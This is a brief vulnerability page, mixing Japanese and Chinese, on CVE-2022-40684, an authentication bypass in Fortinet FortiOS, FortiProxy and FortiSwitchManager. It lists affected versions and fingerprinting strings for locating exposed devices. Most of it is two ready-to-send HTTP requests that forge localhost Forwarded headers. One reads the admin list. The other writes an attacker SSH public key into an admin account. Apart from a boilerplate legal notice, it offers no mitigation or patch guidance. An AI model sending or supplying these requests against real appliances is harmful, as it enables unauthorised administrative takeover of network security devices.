
CVE-2022-40684のPoCとエクスプロイトは、Fortinet FortiOS、FortiProxy、およびFortiSwitchManagerの管理インターフェースにおける認証バイパスであり、巧妙に細工されたHTTPリクエストを介して不正な管理者アクセスを可能にします。
全ての個人及び組織は、ネットワークを利用する際、憲法及び法律を遵守し、公共の秩序を守り、社会の道徳を尊重し、ネットワークの安全を害してはならず、ネットワークを利用して国家安全、栄誉及び利益を害する行為を行ってはならない。
Fortinet(飛塔)は、世界的に有名なネットワークセキュリティ製品およびセキュリティソリューションプロバイダーであり、その製品にはファイアウォール、アンチウイルスソフトウェア、侵入防御システム、エンドポイントセキュリティコンポーネントなどが含まれます。影響を受けるFortiOS、FortiProxy、FortiSwitchManager製品の管理インターフェースでは、代替パスまたはチャネルを使用して認証をバイパスし、認証なしで特別に細工されたHTTPまたはHTTPSリクエストを介して管理インターフェースを操作することができます。
高
FortiOS 版本 7.2.0 - 7.2.1
FortiOS 版本 7.0.0 - 7.0.6
FortiProxy 版本 7.2.0
FortiProxy 版本 7.0.0 - 7.0.6
FortiSwitchManager 版本 7.2.0
FortiSwitchManager 版本 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

